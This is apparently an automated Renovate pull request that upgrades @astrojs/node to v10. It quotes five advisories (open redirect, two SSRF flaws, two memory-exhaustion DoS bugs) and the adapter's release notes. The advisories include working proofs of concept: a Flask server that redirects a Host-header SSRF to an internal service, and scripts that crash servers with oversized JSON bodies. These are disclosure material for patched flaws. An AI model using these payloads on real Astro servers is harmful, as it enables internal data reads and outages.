fix(deps): update dependency @astrojs/node to v10 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
@astrojs/node (source)	9.1.3 → 10.0.0

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

---

@​astrojs/node's trailing slash handling causes open redirect issue

CVE-2025-55207 / GHSA-9x9c-ghc5-jhw9

More information

Details

Summary

Following GHSA-cq8c-xv66-36gw, there's still an Open Redirect vulnerability in a subset of Astro deployment scenarios.

Details

Astro 5.12.8 fixed a case where https://example.com//astro.build/press would redirect to the external origin //astro.build/press. However, with the Node deployment adapter in standalone mode and trailingSlash set to "always" in the Astro configuration, https://example.com//astro.build/press still redirects to //astro.build/press.

Proof of Concept

1. Create a new minimal Astro project (astro@5.12.8)
2. Configure it to use the Node adapter (@astrojs/node@9.4.0) and force trailing slashes:

   // astro.config.mjs
   import { defineConfig } from 'astro/config';
   import node from '@​astrojs/node';
   
   export default defineConfig({
     trailingSlash: 'always',
     adapter: node({ mode: 'standalone' }),
   });

3. Build the site by running astro build.
4. Run the server, e.g. with astro preview.
5. Append //astro.build/press to the preview URL, e.g. http://localhost:4321//astro.build/press
6. The site will redirect to the external Astro Build origin.

Example reproduction

1. Open this StackBlitz reproduction.
2. Open the preview in a separate window so the StackBlitz embed doesn't cause security errors.
3. Append //astro.build/press to the preview URL, e.g. https://x.local-corp.webcontainer.io//astro.build/press.
4. See it redirect to the external Astro Build origin.

Impact

This is classified as an Open Redirection vulnerability (CWE-601). It affects any user who clicks on a specially crafted link pointing to the affected domain. Since the domain appears legitimate, victims may be tricked into trusting the redirected page, leading to possible credential theft, malware distribution, or other phishing-related attacks.

No authentication is required to exploit this vulnerability. Any unauthenticated user can trigger the redirect by clicking a malicious link.

Severity

• CVSS Score: 5.5 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P

References

• https://github.com/withastro/astro/security/advisories/GHSA-9x9c-ghc5-jhw9
• https://github.com/withastro/astro/commit/5fc3c599cacb0172cc7d8e1202a5f2e8685d7ef2
• https://nvd.nist.gov/vuln/detail/CVE-2025-55207
• https://github.com/advisories/GHSA-9x9c-ghc5-jhw9

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Astro has Full-Read SSRF in error rendering via Host: header injection

CVE-2026-25545 / GHSA-qq67-mvv5-fw3g

More information

Details

Summary

Server-Side Rendered pages that return an error with a prerendered custom error page (eg. 404.astro or 500.astro) are vulnerable to SSRF. If the Host: header is changed to an attacker's server, it will be fetched on /500.html and they can redirect this to any internal URL to read the response body through the first request.

Details

The following line of code fetches statusURL and returns the response back to the client:

https://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534

statusURL comes from this.baseWithoutTrailingSlash, which is built from the Host: header. prerenderedErrorPageFetch() is just fetch(), and follows redirects. This makes it possible for an attacker to set the Host: header to their server (eg. Host: attacker.tld), and if the server still receives the request without normalization, Astro will now fetch http://attacker.tld/500.html.

The attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.

Looking at the vulnerable code, the way to reach this is if the renderError() function is called (error response during SSR) and the error page is prerendered (custom 500.astro error page). The PoC below shows how a basic project with these requirements can be set up.

Note: Another common vulnerable pattern for 404.astro we saw is:

return new Response(null, {status: 404});

Also, it does not matter what allowedDomains is set to, since it only checks the X-Forwarded-Host: header.

https://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146

PoC

1. Create a new empty project

npm create astro@latest poc -- --template minimal --install --no-git --yes

2. Create poc/src/pages/error.astro which throws an error with SSR:

---
export const prerender = false;

throw new Error("Test")
---

3. Create poc/src/pages/500.astro with any content like:

<p>500 Internal Server Error</p>

4. Build and run the app

cd poc
npx astro add node --yes
npm run build && npm run preview

5. Set up an "internal server" which we will SSRF to. Create a file called ssrf.txt and host it locally on http://localhost:8000:

cd $(mktemp -d)
echo "SECRET CONTENT" > ssrf.txt
python3 -m http.server

6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:

##### pip install Flask
from flask import Flask, redirect

app = Flask(__name__)

@​app.route("/500.html")
def exploit():
    return redirect("http://127.0.0.1:8000/ssrf.txt")

if __name__ == "__main__":
    app.run()

7. Send the following request to the server, and notice the 500 error returns "SECRET CONTENT".

$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'
HTTP/1.1 500 OK
content-type: text/plain
date: Tue, 03 Feb 2026 09:51:28 GMT
last-modified: Tue, 03 Feb 2026 09:51:09 GMT
server: SimpleHTTP/0.6 Python/3.12.3
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

SECRET CONTENT

Impact

An attacker who can access the application without Host: header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.

For this to be vulnerable, a common feature needs to be used, with direct access to the server (no proxies).

Severity

• CVSS Score: 6.9 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N

References

• https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g
• https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9
• https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4
• https://nvd.nist.gov/vuln/detail/CVE-2026-25545
• https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page
• https://github.com/advisories/GHSA-qq67-mvv5-fw3g

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

CVE-2026-27829 / GHSA-cj9f-h6r6-4cx2

More information

Details

Summary

A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.

Details

Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.

PoC

Details

Setup

Create a new Astro project with the following files:

package.json:

{
  "name": "poc-ssrf-infersize",
  "private": true,
  "scripts": {
    "dev": "astro dev --port 4322",
    "build": "astro build"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@​astrojs/node": "9.5.3"
  }
}

astro.config.mjs — only localhost:9000 is authorized:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  image: {
    remotePatterns: [
      { hostname: 'localhost', port: '9000' }
    ]
  }
});

internal-service.mjs — simulates an internal service on a non-allowlisted host (127.0.0.1:8888):

import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);
  res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
  res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));

src/pages/test.astro:

---
import { getImage } from 'astro:assets';

const result = await getImage({
  src: 'http://127.0.0.1:8888/internal-api',
  inferSize: true,
  alt: 'test'
});
---
<html><body>
  <p>Width: {result.options.width}, Height: {result.options.height}</p>
</body></html>

Steps to reproduce

1. Run npm install and start the internal service:

node internal-service.mjs

2. Start the dev server:

npm run dev

3. Request the page:

curl http://localhost:4322/test

4. internal-service.mjs logs Received: GET /internal-api — the request was sent to 127.0.0.1:8888 despite only localhost:9000 being in the allowlist.

Impact

Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

References

• https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2
• https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9
• https://nvd.nist.gov/vuln/detail/CVE-2026-27829
• https://github.com/advisories/GHSA-cj9f-h6r6-4cx2

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Astro has memory exhaustion DoS due to missing request body size limit in Server Actions

CVE-2026-27729 / GHSA-jm64-8m5q-4qh8

More information

Details

Summary

Astro server actions have no default request body size limit, which can lead to memory exhaustion DoS. A single large POST to a valid action endpoint can crash the server process on memory-constrained deployments.

Details

On-demand rendered sites built with Astro can define server actions, which automatically parse incoming request bodies (JSON or FormData). The body is buffered entirely into memory with no size limit — a single oversized request is sufficient to exhaust the process heap and crash the server.

Astro's Node adapter (mode: 'standalone') creates an HTTP server with no body size protection. In containerized environments, the crashed process is automatically restarted, and repeated requests cause a persistent crash-restart loop.

Action names are discoverable from HTML form attributes on any public page, so no authentication is required.

PoC

Details

Setup

Create a new Astro project with the following files:

package.json:

{
  "name": "poc-dos",
  "private": true,
  "scripts": {
    "build": "astro build",
    "start:128mb": "node --max-old-space-size=128 dist/server/entry.mjs"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@​astrojs/node": "9.5.3"
  }
}

astro.config.mjs:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
});

src/actions/index.ts:

import { defineAction } from 'astro:actions';
import { z } from 'astro:schema';

export const server = {
  echo: defineAction({
    input: z.object({ data: z.string() }),
    handler: async (input) => ({ received: input.data.length }),
  }),
};

src/pages/index.astro:

---
---
<html><body><p>Server running</p></body></html>

crash-test.mjs:

const payload = JSON.stringify({ data: 'A'.repeat(125 * 1024 * 1024) });

console.log('Sending 125 MB payload...');
try {
  const res = await fetch('http://localhost:4321/_actions/echo', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json', 'Accept': 'application/json' },
    body: payload,
  });
  console.log('Status:', res.status);
} catch (e) {
  console.log('Server crashed:', e.message);
}

Reproduction

npm install && npm run build

##### Terminal 1: Start server with 128 MB memory limit
npm run start:128mb

##### Terminal 2: Send 125 MB payload
node crash-test.mjs

The server process crashes with FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory. The payload is buffered entirely into memory before any validation, exceeding the 128 MB heap limit.

Impact

Allows unauthenticated denial of service against SSR standalone deployments using server actions. A single oversized request crashes the server process, and repeated requests cause a persistent crash-restart loop in containerized environments.

Severity

• CVSS Score: 5.9 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/withastro/astro/security/advisories/GHSA-jm64-8m5q-4qh8
• https://nvd.nist.gov/vuln/detail/CVE-2026-27729
• https://github.com/withastro/astro/pull/15564
• https://github.com/withastro/astro/commit/522f880b07a4ea7d69a19b5507fb53a5ed6c87f8
• https://github.com/withastro/astro/releases/tag/@​astrojs/node@9.5.4
• https://github.com/advisories/GHSA-jm64-8m5q-4qh8

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Astro: Memory exhaustion DoS due to missing request body size limit in Server Islands

CVE-2026-29772 / GHSA-3rmj-9m5h-8fpv

More information

Details

Summary

Astro's Server Islands POST handler buffers and parses the full request body as JSON without enforcing a size limit. Because JSON.parse() allocates a V8 heap object for every element in the input, a crafted payload of many small JSON objects achieves ~15x memory amplification (wire bytes to heap bytes), allowing a single unauthenticated request to exhaust the process heap and crash the server. The /_server-islands/[name] route is registered on all Astro SSR apps regardless of whether any component uses server:defer, and the body is parsed before the island name is validated, so any Astro SSR app with the Node standalone adapter is affected.

Details

Astro automatically registers a Server Islands route at /_server-islands/[name] on all SSR apps, regardless of whether any component uses server:defer. The POST handler in packages/astro/src/core/server-islands/endpoint.ts buffers the entire request body into memory and parses it as JSON with no size or depth limit:

// packages/astro/src/core/server-islands/endpoint.ts (lines 55-56)
const raw = await request.text();    // full body buffered into memory — no size limit
const data = JSON.parse(raw);        // parsed into V8 object graph — no element count limit

The request body is parsed before the island name is validated, so the attacker does not need to know any valid island name — /_server-islands/anything triggers the vulnerable code path. No authentication is required.

Additionally, JSON.parse() allocates a heap object for every array/object in the input, so a payload consisting of many empty JSON objects (e.g., [{},{},{},...]) achieves ~15x memory amplification (wire bytes to heap bytes). The entire object graph is held as a single live reference until parsing completes, preventing garbage collection. An 8.6 MB request is sufficient to crash a server with a 128 MB heap limit.

PoC

Environment: Astro 5.18.0, @astrojs/node 9.5.4, Node.js 22 with --max-old-space-size=128.

The app does not use server:defer — this is a minimal SSR setup with no server island components. The route is still registered and exploitable.

Setup files:

package.json:

{
  "name": "poc-server-islands-dos",
  "scripts": {
    "build": "astro build",
    "start": "node --max-old-space-size=128 dist/server/entry.mjs"
  },
  "dependencies": {
    "astro": "5.18.0",
    "@​astrojs/node": "9.5.4"
  }
}

astro.config.mjs:

import { defineConfig } from 'astro/config';
import node from '@​astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
});

src/pages/index.astro:

---
---
<html>
<head><title>Astro App</title></head>
<body>
  <h1>Hello</h1>
  <p>Just a plain SSR page. No server islands.</p>
</body>
</html>

Dockerfile:

FROM node:22-slim
WORKDIR /app
COPY package.json .
RUN npm install
COPY . .
RUN npm run build
EXPOSE 4321
CMD ["node", "--max-old-space-size=128", "dist/server/entry.mjs"]

docker-compose.yml:

services:
  astro:
    build: .
    ports:
      - "4321:4321"
    deploy:
      resources:
        limits:
          memory: 256m

Reproduction:

##### Build and start
docker compose up -d

##### Verify server is running
curl http://localhost:4321/

##### => 200 OK

crash.py:

import requests

##### Any path under /_server-islands/ works — no valid island name needed
TARGET = "http://localhost:4321/_server-islands/x"

##### 3M empty objects: each {} is ~3 bytes JSON but ~56-80 bytes as V8 object

##### 8.6 MB on wire → ~180+ MB heap allocation → exceeds 128 MB limit
n = 3_000_000
payload = '[' + ','.join(['{}'] * n) + ']'
print(f"Payload: {len(payload) / (1024*1024):.1f} MB")

try:
    r = requests.post(TARGET, data=payload,
        headers={"Content-Type": "application/json"}, timeout=30)
    print(f"Status: {r.status_code}")
except requests.exceptions.ConnectionError:
    print("Server crashed (OOM killed)")

$ python crash.py
Payload: 8.6 MB
Server crashed (OOM killed)

$ curl http://localhost:4321/
curl: (7) Failed to connect to localhost port 4321: Connection refused

$ docker compose ps
NAME      IMAGE     COMMAND   SERVICE   CREATED   STATUS    PORTS
(empty — container was OOM killed)

The server process is killed and does not recover. Repeated requests in a containerized environment with restart policies cause a persistent crash-restart loop.

Impact

Any Astro SSR app with the Node standalone adapter is affected — the /_server-islands/[name] route is registered by default regardless of whether any component uses server:defer. Unauthenticated attackers can crash the server process with a single crafted HTTP request under 9 MB. In containerized environments with memory limits, repeated requests cause a persistent crash-restart loop, denying service to all users. The attack requires no authentication and no knowledge of valid island names — any value in the [name] parameter works because the body is parsed before the name is validated.

Severity

• CVSS Score: 5.9 / 10 (Medium)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://github.com/withastro/astro/security/advisories/GHSA-3rmj-9m5h-8fpv
• https://github.com/withastro/astro/commit/f9ee8685dd26e9afeba3b48d41ad6714f624b12f
• https://github.com/withastro/astro/releases/tag/@​astrojs/node@10.0.0
• https://nvd.nist.gov/vuln/detail/CVE-2026-29772
• https://github.com/advisories/GHSA-3rmj-9m5h-8fpv

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

withastro/astro (@​astrojs/node)

v10.0.0

Compare Source

Major Changes

• #​15654 a32aee6 Thanks @​florian-lefebvre! - Removes the experimentalErrorPageHost option

  This option allowed fetching a prerendered error page from a different host than the server is currently running on.

  However, there can be security implications with prefetching from other hosts, and often more customization was required to do this safely. This has now been removed as a built-in option so that you can implement your own secure solution as needed and appropriate for your project via middleware.

What should I do?

If you were previously using this feature, you must remove the option from your adapter configuration as it no longer exists:

// astro.config.mjs
import { defineConfig } from 'astro/config'
import node from '@​astrojs/node'

export default defineConfig({
  adapter: node({
    mode: 'standalone',
-    experimentalErrorPageHost: 'http://localhost:4321'
  })
})

You can replicate the previous behavior by checking the response status in a middleware and fetching the prerendered page yourself:

// src/middleware.ts
import { defineMiddleware } from 'astro:middleware';

export const onRequest = defineMiddleware(async (ctx, next) => {
  const response = await next();
  if (response.status === 404 || response.status === 500) {
    return fetch(`http://localhost:4321/${response.status}.html`);
  }
  return response;
});

Minor Changes

• #​15258 d339a18 Thanks @​ematipico! - Stabilizes the adapter feature experimentalStatiHeaders. If you were using this feature in any of the supported adapters, you'll need to change the name of the flag:

  export default defineConfig({
    adapter: netlify({
  -    experimentalStaticHeaders: true
  +    staticHeaders: true
    })
  })

• #​15759 39ff2a5 Thanks @​matthewp! - Adds a new bodySizeLimit option to the @astrojs/node adapter

  You can now configure a maximum allowed request body size for your Node.js standalone server. The default limit is 1 GB. Set the value in bytes, or pass 0 to disable the limit entirely:

  import node from '@​astrojs/node';
  import { defineConfig } from 'astro/config';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
      bodySizeLimit: 1024 * 1024 * 100, // 100 MB
    }),
  });

• #​15006 f361730 Thanks @​florian-lefebvre! - Adds new session driver object shape

  For greater flexibility and improved consistency with other Astro code, session drivers are now specified as an object:

  -import { defineConfig } from 'astro/config'
  +import { defineConfig, sessionDrivers } from 'astro/config'
  
  export default defineConfig({
    session: {
  -    driver: 'redis',
  -    options: {
  -      url: process.env.REDIS_URL
  -    },
  +    driver: sessionDrivers.redis({
  +      url: process.env.REDIS_URL
  +    }),
    }
  })

  Specifying the session driver as a string has been deprecated, but will continue to work until this feature is removed completely in a future major version. The object shape is the current recommended and documented way to configure a session driver.

• #​14946 95c40f7 Thanks @​ematipico! - Removes the experimental.csp flag and replaces it with a new configuration option security.csp - (v6 upgrade guidance)

Patch Changes

• #​15473 d653b86 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

• #​15562 e14a51d Thanks @​florian-lefebvre! - Updates to new Adapter API introduced in v6

• #​15585 98ea30c Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15777 02e24d9 Thanks @​matthewp! - Fixes CSRF origin check mismatch by passing the actual server listening port to createRequest, ensuring the constructed URL origin includes the correct port (e.g., http://localhost:4321 instead of http://localhost). Also restricts X-Forwarded-Proto to only be trusted when allowedDomains is configured.

• #​15714 9a2c949 Thanks @​ematipico! - Fixes an issue where static headers weren't correctly applied when the website uses base.

• #​15763 1567e8c Thanks @​matthewp! - Normalizes static file paths before evaluating dotfile access rules for improved consistency

• #​15164 54dc11d Thanks @​HiDeoo! - Fixes an issue where the Node.js adapter could fail to serve a 404 page matching a pre-rendered dynamic route pattern.

• #​15745 20b05c0 Thanks @​matthewp! - Hardens static file handler path resolution to ensure resolved paths stay within the client directory

• #​15495 5b99e90 Thanks @​leekeh! - Refactors to use middlewareMode adapter feature (set to classic)

• #​15657 cb625b6 Thanks @​qzio! - Adds a new security.actionBodySizeLimit option to configure the maximum size of Astro Actions request bodies.

  This lets you increase the default 1 MB limit when your actions need to accept larger payloads. For example, actions that handle file uploads or large JSON payloads can now opt in to a higher limit.

  If you do not set this option, Astro continues to enforce the 1 MB default to help prevent abuse.

  // astro.config.mjs
  export default defineConfig({
    security: {
      actionBodySizeLimit: 10 * 1024 * 1024, // set to 10 MB
    },
  });

• Updated dependencies [4ebc1e3, 4e7f3e8, a164c77, cf6ea6b, a18d727, 240c317, 745e632]:

  • @​astrojs/internal-helpers@​0.8.0

v9.5.5

Compare Source

Patch Changes

• Updated dependencies [c2cd371]:
  • @​astrojs/internal-helpers@​0.7.6

v9.5.4

Compare Source

Patch Changes

• #​15564 522f880 Thanks @​matthewp! - Add a default body size limit for server actions to prevent oversized requests from exhausting memory.

• #​15572 ef851bf Thanks @​matthewp! - Upgrade astro package support

  astro@​5.17.3 includes a fix to prevent Action payloads from exhausting memory. @​astrojs/node now depends on this version of Astro as a minimum requirement.

v9.5.3

Compare Source

Patch Changes

• c13b536 Thanks @​matthewp! - Improves error page loading to read from disk first before falling back to configured host

v9.5.2

Compare Source

Patch Changes

• #​15196 a8317c1 Thanks @​ematipico! - Fixes an issue where some prerendered pages weren't correctly rendered when using the Node.js adapter in middleware mode.

• #​15169 b803d8b Thanks @​rururux! - fix: fix image 500 error when moving dist directory in standalone Node

v9.5.1

Compare Source

Patch Changes

• Updated dependencies [9e9c528, 0f75f6b]:
  • @​astrojs/internal-helpers@​0.7.5

v9.5.0

Compare Source

Minor Changes

• #​14441 62ec8ea Thanks @​upsuper! - Updates redirect handling to be consistent across static and server output, aligning with the behavior of other adapters.

  Previously, the Node.js adapter used default HTML files with meta refresh tags when in static output. This often resulted in an extra flash of the page on redirect, while also not applying the proper status code for redirections. It's also likely less friendly to search engines.

  This update ensures that configured redirects are always handled as HTTP redirects regardless of output mode, and the default HTML files for the redirects are no longer generated in static output. It makes the Node.js adapter more consistent with the other official adapters.

  No change to your project is required to take advantage of this new adapter functionality. It is not expected to cause any breaking changes. However, if you relied on the previous redirecting behavior, you may need to handle your redirects differently now. Otherwise, you should notice smoother redirects, with more accurate HTTP status codes, and may potentially see some SEO gains.

v9.4.6

Compare Source

Patch Changes

• #​14514 66a26d7 Thanks @​matthewp! - Fixes compatibility issue with older versions of Astro by making getAllowedDomains() call optional and updating peer dependency to require astro@^5.14.3

v9.4.5

Compare Source

Patch Changes

• Updated dependencies [b8ca69b]:
  • @​astrojs/internal-helpers@​0.7.4

v9.4.4

Compare Source

Patch Changes

• Updated dependencies [1e2499e]:
  • @​astrojs/internal-helpers@​0.7.3

v9.4.3

Compare Source

Patch Changes

• #​14240 77b18fb Thanks @​delucis! - Increases the minimum supported version of Astro to 5.7.0

v9.4.2

Compare Source

Patch Changes

• Updated dependencies [4d16de7]:
  • @​astrojs/internal-helpers@​0.7.2

v9.4.1

Compare Source

Patch Changes

• 5fc3c59 Thanks @​ematipico! - Fixes a routing bug in standalone mode with trailingSlash set to "always".

v9.4.0

Compare Source

Minor Changes

• #​14188 e3422aa Thanks @​ascorbic! - Adds support for specifying a host to load prerendered error pages

  By default, if a user defines a custom error page that is prerendered, Astro will load it from the same host as the one that the request is made to. This change allows users to specify a different host for loading prerendered error pages. This can be useful in scenarios such as where the server is running behind a reverse proxy or when prerendered pages are hosted on a different domain.

  To use this feature, set the experimentalErrorPageHost adapter option in your Astro configuration to the desired host URL. For example, if your server is running on localhost and served via a proxy, you can ensure the prerendered error pages are fetched via the localhost URL:

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  export default defineConfig({
    adapter: node({
      // If your server is running on localhost and served via a proxy, set the host like this to ensure prerendered error pages are fetched via the localhost URL
      experimentalErrorPageHost: 'http://localhost:4321',
    }),
  });

  For more information on enabling and using this experimental feature, see the @astrojs/node adapter docs.

v9.3.3

Compare Source

Patch Changes

• Updated dependencies [0567fb7]:
  • @​astrojs/internal-helpers@​0.7.1

v9.3.2

Compare Source

Patch Changes

• Updated dependencies [f4e8889]:
  • @​astrojs/internal-helpers@​0.7.0

v9.3.1

Compare Source

Patch Changes

• #​14148 e4d74ba Thanks @​ColoredCarrot! - fix(node): emit set-cookie header from middlewares for not-found routes (#​14136)

v9.3.0

Compare Source

Minor Changes

• #​14012 a125a14 Thanks @​florian-lefebvre! - Adds a new experimental configuration option experimentalDisableStreaming to allow you to opt out of Astro's default HTML streaming for pages rendered on demand.

  HTML streaming helps with performance and generally provides a better visitor experience. In most cases, disabling streaming is not recommended.

  However, when you need to disable HTML streaming (e.g. your host only supports non-streamed HTML caching at the CDN level), you can now opt out of the default behavior:

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
  +    experimentalDisableStreaming: true,
    }),
  });

• #​13972 db8f8be Thanks @​ematipico! - Adds support for the experimental static headers Astro feature.

  When the feature is enabled via the option experimentalStaticHeaders, and experimental Content Security Policy is enabled, the adapter will generate Response headers for static pages, which allows support for CSP directives that are not supported inside a <meta> tag (e.g. frame-ancestors).

  import { defineConfig } from 'astro/config';
  import node from '@​astrojs/node';
  
  export default defineConfig({
    adapter: node({
      mode: 'standalone',
      experimentalStaticHeaders: true,
    }),
    experimental: {
      cps: true,
    },
  });

v9.2.2

Compare Source

Patch Changes

• #​13507 660e83f Thanks @​TheOtterlord! - Handle errors where a module is not found when loading the server entrypoint

v9.2.1

Compare Source

Patch Changes

• #​13591 5dd2d3f Thanks @​florian-lefebvre! - Removes unused code

v9.2.0

Compare Source

Minor Changes

• #​13527 2fd6a6b Thanks @​ascorbic! - The experimental session API introduced in Astro 5.1 is now stable and ready for production use.

  Sessions are used to store user state between requests for on-demand rendered pages. You can use them to store user data, such as authentication tokens, shopping cart contents, or any other data that needs to persist across requests:

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.